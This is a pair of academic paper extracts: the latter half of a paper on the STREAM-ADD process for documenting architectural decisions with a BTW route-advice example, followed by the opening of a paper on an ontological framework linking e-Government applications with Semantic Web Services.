With respect to the MVC architectural style, the catalog indicates that this style has a positive impact on the Usability softgoal and a neutral contribution to the Performance and Security softgoals. The contributions to
Precise Advices and Recommendation Relevance
softgoals are also neutral for this architectural alternative.
Last but not least, architectural alternatives can also impact on NFRs. Since there are no NFRs involved in this decision, there is no contribution from the alternatives to NFRs. The model capturing the contributions of the architectural style alternatives to the Softgoals/NFRs satisfaction are illustrated in the Rationale field of the documentation template (Table II). This model will be modified in the next step, by adding prioritization information.
4) Perform Trade-off Analysis of Alternatives
After performing the contribution analysis, the software architect must identify which are the priorities of each softgoal/NFR involved in the analysis. High priority elements are marked with exclamation marks [21]. Then, the architect must perform a trade-off analysis of the alternatives and choose the one that best fulfills the set of softgoals and NFRs as a whole. The trade-off analysis should focus on maximizing the satisfaction of softgoals and NFRs with higher priority. Some reasoning mechanism, such as the one presented in [21], can also be used in order to identify the most suitable architectural alternative.
Once the architectural alternative has been chosen, it should be inserted in the Decision field of the documentation template. Besides that, the model in the Rationale field of the template must be updated with the prioritization information.
In the BTW system, the softgoals with highest priority are Performance and Security. Analyzing the architectural alternatives contributions we can see that the Apply Layers Architectural Style alternative contributes neutrally to Performance softgoal and contributes positively to Security softgoal. On the other hand, the Apply MVC Architectural Style alternative contributes positively to Usability softgoal. Thus, as Performance and Security softgoals have higher priority than Usability softgoal, the selected alternative is Apply Layers Architectural Style (documented in the Decision field of Table II).
5) Specify Architectural Decision Design Fragment
Once the architectural alternative is already selected and documented in the template, the architect must specify a design fragment associated with the architectural decision. A design fragment is composed of architectural elements in Acme, to be incorporated to the early architectural model during the Architectural Refinement With Structural Decisions activity.
A design fragment has different characteristics, depending on the type of the structural architectural decision. For the case of architectural style application, it usually has a global impact in software architecture [7]. Thus, a design fragment produced by an architectural style application decision may modify the architecture as a whole, or a large part of it. In doing so, an architectural style design fragment should be composed of a high level architectural configuration representing the structure of the selected architectural style.
To specify the design fragment associated with the architectural style of BTW, we used the guidelines proposed by [8] to define a three-layer design fragment, whose layers are: Interface, Business and Services. This fragment illustrates how the layers are interconnected (Table II). Each layer is represented as an Acme representation to enable the insertion of other architectural elements in it.
It is important to note that the fragment specified in this step is going to be incorporated to the early architectural model in the Architectural Refinement with Structural Decisions activity (Section B).
6) Fill Additional Information
The last step for the documentation of an architectural decision is to fill the additional information in the documentation template. It includes: (i) Group – information about the type of architectural decision; (ii) Status – the status of the architectural decision (rejected, approved, and so on [13]); (iii) Related Artifacts – documents the artifacts related to the documented decision; (iv) Phase/Iteration – captures the phase or iteration in which the architectural decision was made; (v) Dependencies – the dependencies between new architectural decisions with decisions already made are recorded in this field. The identification of decisions dependencies can be aided by the work presented in [13].
Applying this step to the BTW system, the Group field is filled with the type of the decision made, that is Architectural Style Application. The Status field is filled with the attribute APPROVED to indicate that this decision has been accepted. With respect to the Related Artifacts field, it is filled with the names of the requirements model and the early architectural model of BTW system. The Phase/Iteration field is filled with the “Architectural Design” phase. Finally, it was not identified consequences and dependencies for this decision, thus the Consequences and Dependencies fields of the documentation template are empty. The complete structural architectural documentation template of the Apply Layers Architectural Style decision is presented in Table II.
B. Architectural Refinement With Structural Decisions
In this activity, all structural architectural decisions made on the previous activity are used to refine the early architectural model derived from the i* model. This activity receives as input a set of structural architectural
decisions documented and the early architectural model of the system. The architectural refinement occurs by applying the structural decisions design fragments to the early architectural model.
There is no predefined order to refine the architectural model using the structural decisions design fragments documented in the decisions made. Nevertheless, we propose two general guidelines that might help the selection of an appropriate sequence for the architectural refinement:
**Guideline 1.** The architectural style decisions should have the highest priority in the architectural refinement sequence. This guideline is motivated by the idea that, in general, architectural styles affect the system architecture in a global way [7].
**Guideline 2.** Architectural decision design fragments whose architectural configuration is more complex should have higher priority. The complexity of the fragments may be measured according to the number of Acme components, representations and connectors.
After establishing a refinement sequence for the architectural decisions, for each structural decision, the architect must analyze its design fragment, identify the architectural model elements affected by the fragment and perform the refinement. It is important to note that the refinement of architectural models is incremental, so that a decision should be applied to refine the architectural model derived from the refinement according to the previous decision.
In our running example, the early architectural model of the BTW system (Fig. 3) is refined with the Apply Layers Architectural style (Table II). The architecture represented in Fig. 5 is the BTW architectural model refined with this architectural decision. For the moment ignore the blue dashed (Google Maps) component as it is the result of an activity to be explained below. This refinement was made based on a set of guidelines proposed in [8]. Hence, each component was mapped as follows: (i) Advice Giver and Advice Receiver components were mapped to the “Interface” layer; (ii) Internet Provider and Map Info Publisher components were included in the “Services” layer, and; (iii) BTW, User Access Controller, Mapping Handler and Internet Business components were mapped to the “Business” layer. Therefore, in order to respect the strict definition of the Layers pattern, Internet Business component is introduced in the middle layer to provide internet services to the top layer.
**C. Technology Decisions Documentation**
Similarly to structural decision, technology decisions need to be documented. Technology decisions should not contain specific details about implementation but decisions that affect the architecture globally or specify how particular structural aspects must be implemented [11]. This is the main reason why the technology architectural decision-making usually occurs after the structural architectural decision-making. In addition, technology architectural decisions also limit the technologies used when implementing the system [13]. Technology decisions may be related to programming language, specific frameworks or APIs (Application Programming Interfaces), component reuse, database management system and so on.
The inputs to this activity are: the modular i* model (Fig. 1), the architectural model refined with structural decisions in the previous activity (Fig. 5), the system NFRs list (Table I) and the decisions documentation template.

In order to fill the documentation template with technology decisions, we rely on the same steps presented in the Structural Architectural Decisions activity, but with some variations. Given the similarities, we will focus on the application of these steps in a decision related to the selection of a technology for maps visualization and interaction to be used in the BTW system.
1) **Identify Requirements and Stakeholders Addressed by the Decision**
In order to illustrate this activity, we are going to consider the decision made in our running example to determine which maps visualization and interaction technologies available are more appropriate to be used in the BTW system.
The Information Be Published in Map goal, present in the i* model, is affected by this technology decision, as well as the Usability softgoal. In this sense, the Requirements field of this decision documentation template (Table III) is filled with these requirements.
Regarding the Stakeholders field, as the Traveller actor has a dependency relationship with Usability softgoal, it is inserted in this field of the documentation template. By analyzing Table I, we have identified that all NFRs are affected by the considered architectural alternatives. This way, the NFRs field of Table III is filled with Minimize Costs, Minimize Development Time and Maximize Mashup Engineering.
2) Identify Architectural Alternatives
In order to illustrate this step to a technology decision, we considered possible alternatives to the maps visualization and interaction technology for the BTW system. In this sense, the available technologies to handle the visualization and interaction of maps that were identified are: Use Google Maps, Use Bing Maps and Implement Own Maps Solution. These alternatives were included in the Alternatives field of the documentation template presented in Table III).
Table III – Documentation Template for the Use Google Maps Decision
<table>
<thead>
<tr>
<th>Requirements</th>
<th>Information be Published in Map; Usability</th>
</tr>
</thead>
<tbody>
<tr>
<td>Stakeholders</td>
<td>Travellers</td>
</tr>
<tr>
<td>NFRs</td>
<td>Minimize Costs, Minimize Development Time, Maximize Mashup Engineering</td>
</tr>
<tr>
<td>Alternatives</td>
<td>Use Google Maps; Use Bing Maps; Implement Own Maps Solution</td>
</tr>
</tbody>
</table>
3) Perform Contribution Analysis of Alternatives
At this point, we analyze the contributions from the alternatives to the satisfaction of the softgoals and NFRs, identified in the previous steps. It was identified that the Use Google Maps alternative contributes positively to the Minimize Costs NFR because the former is a free solution. This alternative also contributes in a positive way to the Minimize Development Time NFR, because it is already implemented and has a good documentation, and also contributes positively to the Maximize Mashup Engineering NFR, since it is a service available online. Moreover, Google Maps provides an intuitive and easy graphical user interface. Hence it contributes positively to the Usability softgoal.
Regarding the Use Bing Maps alternative, it contributes positively to the Minimize Costs NFR, because it is also a free solution, but it has neutral impact on the Minimize Development Time NFR, because its documentation is not satisfactory. Moreover, this alternative contributes in a positive way to the Maximize Mashup Engineering NFR, because it is available as an online service as well. At last, the Implement Own Maps alternative provides an intuitive and friendly graphical user interface, so that it contributes positively to the Usability softgoal. Finally, the Implement Own Maps Solution contributes negatively to the Minimize Costs NFR, since it is necessary to spend time and people to the development of this solution. It also contributes negatively to the Minimize Development Time NFR, because it needs to be implemented from scratch. This alternative also contributes negatively to the Maximize Mashup Engineering NFR, because this alternative does not use online services. Moreover, it has an unknown impact on the Usability softgoal, since its usability can only be evaluated after its development starts. Please note that in the Rationale field of the Table III NFRs and alternatives are both graphically represented as clouds; however, architectural alternatives are represented as clouds with a thicker border.
4) Perform Trade-off Analysis of Alternatives
This step is concerned with choosing the most suitable alternative regarding the fulfillment of softgoals and NFRs. For doing this, it is required to define the priorities of softgoals and NFRs. In our running example, the Usability softgoal and the Minimize Development Time NFR have the highest priority. Observing the model present in the Rationale field of Table III, we conclude that the Implement Own Maps Solution alternative is dismissed because it does not contribute at all to the NFRs/Softgoals. We also can see that the Use Google Maps alternative contributes positively to the Minimize Development Time NFR, whereas the Use Bing Maps alternative contributes neutrally to the same NFR. Regarding the Usability softgoal, both remaining alternatives have positive impact on its fulfillment. Thus, we conclude that Use Google Maps is the most suitable alternative and it is included in the Decision field of the template presented in Table III, whereas the model used to perform this analysis is updated in the Rationale field.
5) Specify Architectural Decision Design Fragment
In this step, the design fragment associated with the selected architectural alternative is specified. In general, an architect needs to analyze if an architectural decision produces a design fragment that can affect/modify the structure of the software architecture. However,
depending on the technology decision type, a design fragment can be produced in different ways, or even not be produced at all. Therefore, we do not propose in this step general guidelines to aid the specification of design fragments. In this case, the architect is in charge to specify the design fragment according to each architectural decision made.
The design fragment produced for the \textit{Use Google Maps} decision is presented in the \textit{Design Fragment} field of the documentation template (Table III). This fragment is composed of an architectural configuration that shows how the \textit{Mapping Handler} and \textit{Map Info Publisher} components of the BTW system (previously responsible for addressing the requirements affected by this decision) use the services of the \textit{Google Maps} component.
6) \textit{Fill Additional Information}
Finally, in this step, the additional information regarding the technology decision made is filled in the documentation template. Thus, the \textit{Group} field is filled with the requirements group addressed by this architectural decision: \textit{Maps Visualization and Interaction Services}. The \textit{Status} field is filled with the \textit{APPROVED} attribute. The \textit{Related Artifacts} field is filled with the project artifacts involved in this decision: \textit{BTW modular i* model} and \textit{BTW Acme model refined with structural decisions}. The \textit{Phase/Iteration} field is filled with \textit{Architectural Design}. Regarding the \textit{Consequences} field, the decision taken implies that software developers have to learn how to use \textit{Google Maps} services. Finally, it was not identified any dependencies between this decision and others, so that the \textit{Dependencies} field is empty.
D. \textit{Architecture Refinement With Technology Decisions}
After making and documenting all technology decisions, they are used to refine the architectural model that was previously refined with structural decisions. To perform this refinement, this activity receives as input a set of technology decisions documented in a template and the architectural model obtained from the \textit{Architectural Refinement with Structural Decisions} activity. It is worth noting that only technology decisions that produce a design fragment can be used to refine the architectural model.
As commented before, there is no predefined sequence to apply the architectural decisions in the architectural model refinement. Hence, the architect is in charge of defining this sequence. However, the architect can rely on the Guideline 2 defined in Section B to determine the proper refinement sequence. After doing this, the design fragment of each documented decision has to be analyzed, to identify which parts of the architectural model are going to be affected by them. Then, the refinement can be performed.
As a result, the dashed blue component in Fig. 5 represents the \textit{Google Maps} component that was inserted in the architectural model. The \textit{Map Info Publisher} and \textit{Mapping Handler} components delegate the responsibility of providing maps visualization and interaction services to the \textit{Google Maps} component.
V. \textit{Discussion}
The original Strategy for Transition between \textit{RE}quirements models and \textit{Architectural Models} (STREAM) [8] is a systematic process aimed to define architectures through a model-driven approach. It strongly relies on transformation rules to incrementally evolve a requirements model in i* onto an architectural model. If necessary, this architecture is further detailed through architectural style or refinement patterns application. However, even though STREAM offers a systematic way for deriving architectural models that takes benefits of using goal-oriented models and models transformations, it does not support the documentation of architectural decisions and their rationale.
In order to address this limitation, we defined in this work the STREAM-ADD process. This extended process brings to the original STREAM the benefits of documenting architectural design decisions. Even though we did not perform a thorough evaluation of our process, the results reported by the software architecture literature suggests that documenting architectural decisions compensates by far the extra architectural design effort required to document architectural decisions in this process.
Moreover, our process also allows the early architectural model derived by the application of the two first STREAM activities to be better refined through architectural decisions. The architectural model refinements with structural and technology decisions activities of STREAM-ADD allows the specification of a more complete components-and- connectors architectural view than the original STREAM process.
It is important to note that the new STREAM-ADD process does not aim to systematize the actual decision-making. Instead, it provides a set of activities that aid the architect in documenting these architectural decisions. In other words, a software architect can make every architectural decision that she considers necessary but she needs to document the rationale that lead her to make the decision and how this decision affects requirements and architectural models. Nonetheless, as a positive side effect, the documentation steps provide some guidance to the software architecture regarding the decision-making, as it requires the documentation of some elements that could be otherwise overlooked.
In the interest of clarity, the proposed process was sequentially presented, like a waterfall model. However, in fact it was conceived as an iterative and incremental process. For instance, considering the two first activities of the Architectural Model Refinement sub-process in the context of an industrial project, it is more likely that some structural decisions will be documented, and then applied...
to the model. Next, other new structural decisions will be documented, and also applied to the model, so on and so forth.
It is also worth noting that, as in the original STREAM approach, the outcome the process depends on the quality of the input artifacts (e.g., $i^*$ models). Thus, if poor quality $i^*$ models are used it is likely that the resulting architectural model derived will also be of poor quality.
In the following sub-section we discuss our approach in comparison with other approaches for architecture derivation from requirements models and for architectural decisions documentation.
A. Related Work
Different strategies, techniques and models can be used when deriving architectures from requirements models. The SIRA approach [6], for instance, uses $i^*$ models as input, resulting an architectural model using organizational architectural styles. The work by Chung et al. [22] has some similarities with our process, but it lacks the documentation activities that are essential in our proposal. The UML Components process [23] proposes a set of activities in order to derive a UML component diagram from use cases models and from a business conceptual model. However, it derives a limited architecture (always in fours layers) and does not allow the structural and technological decision-making. Other approaches that use $i^*$ modeling language as the starting point of software specification, such as PRIM [24], do not support a systematic transition from requirements specifications to architectural design description.
Silva et al. [25] proposes a set of mapping rules between an asceptual goal model and an asceptual version of Acme. However, it does not support any kind of architectural decision. The CBSP approach [26] creates intermediate models to facilitate the development of architectures from requirements. It lacks proper support for making and documenting technology decisions. Galster et al. [27] defines requirements for architecture derivation processes, based on a review of approaches presented in the literature. Our approach does not properly satisfy the following requirements: underlying formal approach; manage different architectural views; reuse of architectural knowledge; handle different modeling notations. In particular, we plan to tackle the issue related to architectural views in future work.
Architectural design decisions documentation plays a key role in our approach and has been the focus of several studies presented in the literature. Shahin et al. [18] describes a survey on architectural decisions documentation models, which vary on their degree of formality from textual templates to well-defined metamodels. It defines four major elements – decision, constraint, solution, rationale – and eight minor elements – problem, group, status, dependency, artifact, consequence, stakeholder, phase/iteration. All these twelve elements are included in our template. A novel contribution of our paper is the use of goal-based requirements model to drive documentation activities. Moreover, our approach relies on NFR-based models to define the decision rationale, which not only describe the rationale but also may help in the decision-making process. It is worth noting that architectural design decisions documentation is the foundation of architectural knowledge management area, see [3] for some works in this research line.
VI. Conclusions
This paper presented STREAM-ADD, a process that extends the original STREAM architectural derivation process in order to create a more complete architectural model by encompassing both the architectural models and the architectural decisions. The first and second activity were maintained as-is from the original STREAM process. In the third activity, the early architectural model generated by models transformations is refined with further architectural decisions.
The third activity was extended by defining a subprocess composed of four sub-activities: the first two are related to the structural architecture, whereas the last two are related to technology decisions. In order to support the realization of these sub-activities, we presented a set of steps and general guidelines for each activity.
As future work, we expect to develop tool support for our approach. Such a tool would need to support all documentation and modeling activities of the process. We also intend to apply the STREAM-ADD process in the architecture specification of more complex systems, especially in an industrial context.
Our approach still needs to be extended in order to support the systematic specification of other architectural views specification in systematic way, including behavior characteristics of the architecture. Finally, we acknowledge that a thorough experimentation must be performed in order to evaluate and improve the STREAM-ADD process.
ACKNOWLEDGMENTS
This work has been supported by the Brazilian institutions: Conselho Nacional de Desenvolvimento Científico e Tecnológico (CNPq) and Coordenação de Aperfeiçoamento de Pessoal de Nível Superior (CAPES).
REFERENCES
|
{"Source-Url": "http://www0.cs.ucl.ac.uk/staff/A.Finkelstein/papers/compsac12.pdf", "len_cl100k_base": 8470, "olmocr-version": "0.1.53", "pdf-total-pages": 10, "total-fallback-pages": 0, "total-input-tokens": 36209, "total-output-tokens": 10656, "length": "2e13", "weborganizer": {"__label__adult": 0.00046896934509277344, "__label__art_design": 0.0026798248291015625, "__label__crime_law": 0.00031757354736328125, "__label__education_jobs": 0.0014543533325195312, "__label__entertainment": 0.00010824203491210938, "__label__fashion_beauty": 0.00021564960479736328, "__label__finance_business": 0.0002472400665283203, "__label__food_dining": 0.00044035911560058594, "__label__games": 0.0008721351623535156, "__label__hardware": 0.0006561279296875, "__label__health": 0.00039887428283691406, "__label__history": 0.00043320655822753906, "__label__home_hobbies": 9.447336196899414e-05, "__label__industrial": 0.0004425048828125, "__label__literature": 0.00052642822265625, "__label__politics": 0.00027179718017578125, "__label__religion": 0.0006818771362304688, "__label__science_tech": 0.0183563232421875, "__label__social_life": 8.791685104370117e-05, "__label__software": 0.00604248046875, "__label__software_dev": 0.96435546875, "__label__sports_fitness": 0.0003464221954345703, "__label__transportation": 0.00045990943908691406, "__label__travel": 0.0002453327178955078}, "weborganizer_max": "__label__software_dev", "avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_ratio": [[0, 49714, 0.01538]], "fineweb_edu_fasttext_gt2__fineweb_edu_fasttext_gt2__score": [[0, 49714, 0.55069]], "ft_lang_id_en_doc_v2__ft_lang_id_en_doc_v2__en": [[0, 49714, 0.89759]], "google_gemma-3-12b-it_contains_pii": [[0, 5158, false], [5158, 9608, null], [9608, 14206, null], [14206, 18696, null], [18696, 24161, null], [24161, 28614, null], [28614, 33452, null], [33452, 39420, null], [39420, 44805, null], [44805, 49714, null]], "google_gemma-3-12b-it_is_public_document": [[0, 5158, true], [5158, 9608, null], [9608, 14206, null], [14206, 18696, null], [18696, 24161, null], [24161, 28614, null], [28614, 33452, null], [33452, 39420, null], [39420, 44805, null], [44805, 49714, null]], "google_gemma-3-4b-it_v2tag__is_academic_paper": [[0, 5000, true], [5000, 49714, null]], "google_gemma-3-4b-it_v2tag__is_class_syllabus": [[0, 5000, false], [5000, 49714, null]], "google_gemma-3-4b-it_v2tag__is_completion_certificate": [[0, 5000, false], [5000, 49714, null]], "google_gemma-3-4b-it_v2tag__is_court_notice": [[0, 5000, false], [5000, 49714, null]], "google_gemma-3-4b-it_v2tag__is_homework_assignment": [[0, 5000, false], [5000, 49714, null]], "google_gemma-3-4b-it_v2tag__is_news_article": [[0, 5000, false], [5000, 49714, null]], "google_gemma-3-4b-it_v2tag__is_public_order": [[0, 5000, false], [5000, 49714, null]], "google_gemma-3-4b-it_v2tag__is_resume_cv": [[0, 5000, false], [5000, 49714, null]], "google_gemma-3-4b-it_v2tag__is_test_or_quiz": [[0, 5000, false], [5000, 49714, null]], "google_gemma-3-4b-it_v2tag__is_textbook": [[0, 5000, false], [5000, 49714, null]], "pdf_page_numbers": [[0, 5158, 1], [5158, 9608, 2], [9608, 14206, 3], [14206, 18696, 4], [18696, 24161, 5], [24161, 28614, 6], [28614, 33452, 7], [33452, 39420, 8], [39420, 44805, 9], [44805, 49714, 10]], "pipe_delimited_lines_v1__pipe_delimited_lines_v1__pipe_delimited_lines_ratio": [[0, 49714, 0.06061]]}
|
olmocr_science_pdfs
|
2024-12-06
|
2024-12-06
|
2175c8c4ac2f365a37591158ef358413ba2796df
|
Knowledge modelling for integrating semantic web services in e-government applications
Knowledge Modelling for Integrating E-Government Applications and Semantic Web Services
Alessio Gugliotta, Liliana Cabral and John Domingue
Knowledge Media Institute, The Open University
Walton Hall
Milton Keynes, MK7 6AA, UK.
{a.gugliotta, l.s.cabral, j.b.domingue}@open.ac.uk
Abstract
Service integration and domain interoperability are the basic requirements in the development of current service-oriented e-Government applications. Semantic Web and, in particular, Semantic Web Service (SWS) technology aim to address these issues. However, the integration between e-Government applications and SWS is not an easy task. We argue that a more complex semantic layer needs to be modeled. The aim of our work is to provide an ontological framework that maps such a semantic layer. In this paper, we describe our approach for creating a project-independent and reusable model, and provide a case study that demonstrates its applicability.
Introduction
The current trends in e-Government applications call for joined-up services that are simple to use, shaped around and responding to the needs of the citizen, and not merely arranged for the provider’s convenience. In this way, the users need have no knowledge of – nor direct interaction with – the government entities involved. On practical grounds, the integration of services is a basic requirement of service-oriented systems, which aim at gathering and transforming processes - needed for a particular user - into one single service and the corresponding back-office practices. They enable the building of agile networks of collaborating business applications distributed within and across organization boundaries. Thus, services need to be interoperable in order to allow for data and information to be exchanged and processed seamlessly across government.
The Semantic Web (T. Berners-Lee 2001) aims to alleviate integration and interoperability problems. By allowing software agents to communicate and understand the information published, the Semantic Web enables new ways of consuming services. In particular, Semantic Web Service (SWS) technology provides an infrastructure in which new services can be added, discovered and composed continually, and the Public Administration (PA) processes automatically updated to reflect new forms of cooperation (Gugliotta et al. 2005). It combines the flexibility, reusability, and universal access that typically characterize a Web Service, with the power of semantic mark-up, and reasoning in order to make feasible the invocation, composition, mediation, and automatic execution of complex services with multiple conditional paths of execution, and nested services inside them (Sycara et al. 2003), (Domingue et al. 2004).
However, the integration between e-Government applications and SWS’s is not an easy task. We present an approach for knowledge management based on SWS technology and the following e-Government requirements:
• the PA worker - and in general a domain expert - does not directly use the SWS infrastructure to represent knowledge internally. For instance, organizations will likely adopt their own workflow paradigm to describe their processes (van der Aalst, ter Hofstede, & Weske 2003).
• The PA work routines involve interactions with non-software agents, such as citizens, employees, managers and politicians. Multiple viewpoints need to be considered.
• In real cases, component services are not atomic, and cannot in general be executed in a single-response step; they may need to follow an interaction protocol with non-software agents that involves multiple sequential, conditional and iterative steps. For instance, a service may require a negotiation between the user and the provider.
• Web service description is an important but restricted aspect of an e-Government service-supply scenario.
In this paper, we argue that a more complex semantic layer for managing government services needs to be modelled - and a middleware system designed on such a model - in order to meet the requirements of real-life applications. In particular, we identify three knowledge levels.
Configuration, describing the context in which services are supplied: requirements, resources, actor’s role, business processes, and transactions of an e-Government service-supply scenario.
Re-configuration, describing the context in which services may be modified: legislations, policies, and strate-
gies influencing the development and management of an e-Government service-supply scenario.
Service delivery, adopting SWS technology as the base for the description, discovery, composition, mediation, and execution of (Web) services.
As a result, the integration of e-Government applications with SWS’s requires a framework which maps and combines the knowledge levels described above. The aim of our work is to provide such a framework with which most PA’s – or generally organizations – can identify, from which they can work when designing and delivering e-Government services. Such a general framework can be adapted and applied as appropriate.
Our approach is grounded on a technological paradigm able to fit a general distributed organization of knowledge, with focus on the supply of services. The proposed framework is considered from the following two different dimensions.
(i) Conceptual modelling: this is a double stage process that first creates a conceptualization of the reality in terms of conceptual models, and then uses ontologies to represent the semantic structure of involved knowledge, enabling knowledge use and reuse. The result is an ontological framework for service-oriented e-Government applications.
(ii) Creating of an infrastructure for semantic interoperability: software modules are used to implement the functionalities of a middleware system that enables the automated interpretation and paves a common ground for services. The result is a semantically-enhanced middleware for service-oriented e-Government applications.
Current work concerns the first dimension, on which we shall focus in the rest of the paper.
Related Work
Although service-oriented computing is a relatively new field, many e-Government applications have been developed and various approaches have been proposed.
To quote a few examples, eGov (eGOV 2004), and EU-PUBLI.com (EU-PUBLI 2004) define architectures based on Web services interfacing PA legacy systems. The goal of these projects is to achieve one-stop E-Government. XML dialects are used to define metadata and orchestration of services.
SmartGov (SmartGov 2004), ICTE-PAN (ICTE-PAN 2004) and E-Power (Engers et al. 2004) projects use ontologies for representing e-Government knowledge. In particular, SmartGov and ICTE-PAN developed two ontologies describing the profile of a service.
OntoGov (OntoGov 2004) and TerreGov (TerreGov 2004) adopt SWS approach for describing services provided by PA’s. However, they do not completely take advantage of SWS technology. OntoGov develops an own ontology for describing e-Government services mixing aspects of the two main approaches OWL-S (OWL-S Coalition 2004) and WSMO (Dumitru, Holger, & Uwe 2004), in order to satisfy some e-Government requirements that are not addressed by such approaches. TerreGov adopts OWL-S for describing, and discovering services but it uses BPEL language for describing composition of services (eProcedure).
These approaches face more or less the same problems: there is no generic domain analysis for the overall PA system at any level of granularity; there are no generic PA models for processes and objects; there are no ontologies for modelling PA objects and relationships; there are no standard vocabularies for describing concepts. Consequently, the researchers have to build from scratch PA ontologies to be used as test-beds for demonstrating the functionalities of their systems. The main focus of these initiatives is to not build a PA domain ontology, but rather to test and validate specific technological solutions. As a result, they propose ad hoc description for the PA domain and far from being considered reusable.
Moreover, existing approaches usually address specific service-oriented models, where the provider’s point of view plays a central role. However, the e-Government scenario is composed by several actors. Each of them deals with different kinds of knowledge, conceptions, processes; in other words they have different viewpoints. Such viewpoints influence and relate to the service differently.
Requirements for the Conceptual Model
Starting from the analysis of the above projects, we defined the following objectives of our approach.
General purpose. The aim of our work is not to represent all of the existing concepts and relations connected to the e-Government domain. As in the ICTE-PAN project, the idea is to create some modules driving domain experts to develop domain ontologies describing the specific scenario and helping developers to implements SWS’s based on the domain expert’s representations. In particular, these modules outline a generic service-supply scenario that domain experts can adapt and extend using different levels of granularity on the basis of scenario characteristics. The result is a re-usable, extensible, and flexible model.
Life Event approach. All of the projects introduced here adopt a service-oriented approach. The service provided by organizations is the central concept. For instance, in the eGov and OntoGov projects, the user point of view is described by a taxonomy of life events simply representing how to arrange the services in the portal. In our vision, the life event concept plays a central role prompting the supply of services by several organizations and representing the point of contact among the different actor’s viewpoint. It represents the starting point for the description of the involved scenario knowledge.
Contextualization. Our approach allows us to contextualize – i.e. describing various notions of context, non physical situations, topics, plans, beliefs, etc. as entities – an e-government scenario in terms of descriptions. In particular, we distinguish between descriptive entities – that are independent views on a scenario by different involved actors – and the actual objects they act upon - representing the concepts of the actor’s vocabularies. This captures that multiple overlapping (or alternative) contexts may match the same world or model, and that such contexts can have systematic relations among their elements.
PA Autonomy and Cooperative Development. The domain standardization (introduced by the different e-Government
projects) can help, but it does not necessarily unify the aims and languages of all the involved organizations and actors. Each of them should keep its autonomy describing its own domain. Actually, distinct organizations could use or describe the same concepts differently. This implies the need of address the issues of mediation between heterogeneous sources, but allows the co-operative development of an e-Government application.
**Business Process and Interaction description.** The process flow of e-Government processes can be modeled using standard control structure and tasks. Different projects adopt different approaches. For instance, OntoGov adopts the OWL-S process model while TerreGov will adopt BPEL. Unlike the other approaches, we introduce an Interaction description that is a useful means of introducing model checking to the requirements gathering process, as well as a key but too often neglected component of business process. Actually, we distinguish between a plan describing processes and organising concepts within an actor’s viewpoint and interaction describing mutual actions involving two different actor’s viewpoints.
**Delegation.** Service integration will allow organizations to delegate the execution of some of their tasks to external organizations. This includes looking for and identifying the right organization. In our approach, we explicitly define how declare delegate tasks. This aspect is strictly connected to the above interaction description representing the protocol to consume the delegation.
**SWS standards.** SWS technology addresses the integration and interoperability issues between services provided by heterogeneous organizations. However, some e-Government requirements cannot be represented by existing SWS approaches. In our approach, we clearly distinguish between the e-Government scenario description – addressing the e-Government requirements – and SWS descriptions. The two levels are integrated without requiring changes to SWS standards.
**Meta-Modelling the Conceptual Model**
A conceptual model is an abstract and simplified description of the reality that has to be represented. An explicit specification of a conceptual model is an ontology.
To match the re-usability requirement of our approach, we refer to the conceptual model as an abstract definition of how to describe and develop a domain of interest: a model of modelling (Fernandez-Lopez 2001). It points out the building blocks that are used in models of the domain, the relationships between the building blocks, and how to build models.
The ontologies mapping such a conceptual model are domain-independent ontologies – i.e. meta-ontologies – specifying the schema to be followed by the modeling process and the general concepts and relations that may be extended and adapted.
Applying a specific scenario to the meta-model, the result is a model for a specific application (Figure 1). Starting from meta-ontologies, the resulted ontologies describe application-dependent concepts, relations, axioms, etc.
**Figure 1: Meta-modelling approach.**
The meta-modelling approach is the base for the cooperative and distributed development of an application-specific conceptual model. It allows involved actors to keep their autonomy in the description of their domains: each actor follows the proposed schema (meta-graph) to create ontologies extending and adapting the meta-ontologies. All of the obtained ontologies describe the application-specific conceptual model; each of them can define one or more actor’s viewpoints and may refer to other application ontologies.
**Ontologies for Meta-Modelling**
To facilitate the building of meta-ontologies, we refer to existing reference ontologies. We extend them and reuse some of their modules to create our ontologies. Actually, we refer to DOLCE (Oltramari et al. 2002) as upper ontology for describing domain concepts, its Description & Situation module (Gangemi & Mika 2001) as approach for knowledge contextualization (i.e. representing various points of view on a scenario, possibly with different granularity), and WSMO (Dumitru, Holger, & Uwe 2004) for describing Web services.
**Descriptive Ontology for Linguistic and Cognitive Engineering (DOLCE)**
DOLCE belongs to the WonderWeb project Foundational Ontology Library (WFOL) and is designed to be minimal in that it includes only the most reusable and widely applicable upper-level categories, rigorous in terms of axiomatization and extensively researched and documented (Oltramari et al. 2002).
DOLCE has been chosen due to its internal structure – rich axiomatization, modularization, explicit construction principles, careful reference to interdisciplinary literature, commonsense-orientedness. In addition, being part of the WFOL, DOLCE will be mapped onto other foundational ontologies – possibly more suitable for certain applications – and be extended with modules covering different domains (e.g., legal and biomedical); with problems and lexical resources (e.g., WordNet-like lexical). Internal consistency and external openness make DOLCE specially suited to our needs.
The Description & Situations (D&S)
D&S is the module of the DOLCE ontology that describes context elements. While modelling physical objects or events in DOLCE is quite straightforward, intuition comes to odds when we want to model non-physical objects such as social institutions, plans, organizations, regulations, roles or parameters. The representation of context is a common problem in many realistic domains from technology and society which are full of non physical objects, e.g. non-physical situations, norms, plans, beliefs, or social roles are usually represented as a set of statements and not as concepts.
D&S results to be a theory of ontological contexts because it is capable of describing various notions of context or frame of reference (non physical situations, topics, plans, beliefs, etc.) as entities. It features a philosophically concise axiomatization.
D&S introduces a new category, Situation, that reifies contexts, episodes, configurations, state of affairs, cases, etc. and is composed by entities of the ground ontology (e.g. a domain ontology derived from DOLCE). A Situation satisfies a Situation Description, which represents a conceptualization (as a mental object or state), hence generically dependent on some agent, and which is also social, i.e. communicable.
Situation descriptions are composed of descriptive entities, i.e., Parameters, Functional Roles and Courses of Events. Axioms enforce that each descriptive component links to a certain category of DOLCE (the actual objects they act upon): Parameters are valued by Regions, Functional Roles are played-by Endurants and Courses of Events sequence Perdurants.
This captures that multiple overlapping (or alternative) contexts may match the same world or model, and that such contexts can have systematic relations among their elements.
D&S shows its practical value when applied as reference ontology for structuring application ontologies that require contextualization. As we will see in the remainder of this paper, this is the case when describing the e-Government service-supply scenario.
Web Service Modelling Ontology (WSMO)
We adopt WSMO (Dumitru, Holger, & Uwe 2004) because it follows design principles that embrace our approach and that other standards do not have.
Strict Decoupling. Decoupling denotes that WSMO resources are defined in isolation, meaning that each resource is specified independently without regard to possible usage or interactions with other resources. This complies with our distributed and cooperative approach.
